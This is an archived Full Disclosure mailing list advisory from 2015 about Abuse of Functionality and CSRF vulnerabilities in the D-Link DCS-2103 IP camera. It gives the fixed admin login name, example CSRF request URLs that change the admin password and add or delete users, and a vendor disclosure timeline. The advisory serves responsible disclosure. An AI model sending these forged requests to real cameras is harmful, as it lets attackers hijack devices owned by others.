
Full Disclosure mailing list archives
AoF and CSRF vulnerabilities in D-Link DCS-2103
From: "MustLive" <mustlive () websecurity com ua>
Date: Sun, 25 Oct 2015 21:11:44 +0200
Hello list!There are Abuse of Functionality and Cross-Site Request Forgery vulnerabilities in D-Link DCS-2103 (IP camera).
------------------------- Affected products: -------------------------Vulnerable is the next model: D-Link DCS-2103, Firmware 1.20. All previous versions also must be vulnerable.
---------- Details: ---------- Abuse of Functionality (WASC-42):Admin's login is persistent: admin. Which simplify BF and CSRF attacks (about Brute Force I wrote in the second advisory).
Cross-Site Request Forgery (WASC-09): Change admin's password: http://site/vb.htm?adduser=admin:password:0 Add user: http://site/vb.htm?adduser=user:pass:2 Delete user: http://site/vb.htm?deluser=user ------------ Timeline: ------------2014.11.14-2014.12.13 - conversation with D-Link about previous vulnerabilities in DCS-2103.
2015.07.23 - disclosed at my site previous vulnerabilities in DCS-2103. 2015.08.23 - informed developers about new vulnerabilities in DCS-2103. 2015.08.24 - announced at my site about new vulnerabilities in DCS-2103. 2015.10.24 - disclosed at my site (http://websecurity.com.ua/7877/). Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- AoF and CSRF vulnerabilities in D-Link DCS-2103 MustLive (Oct 27)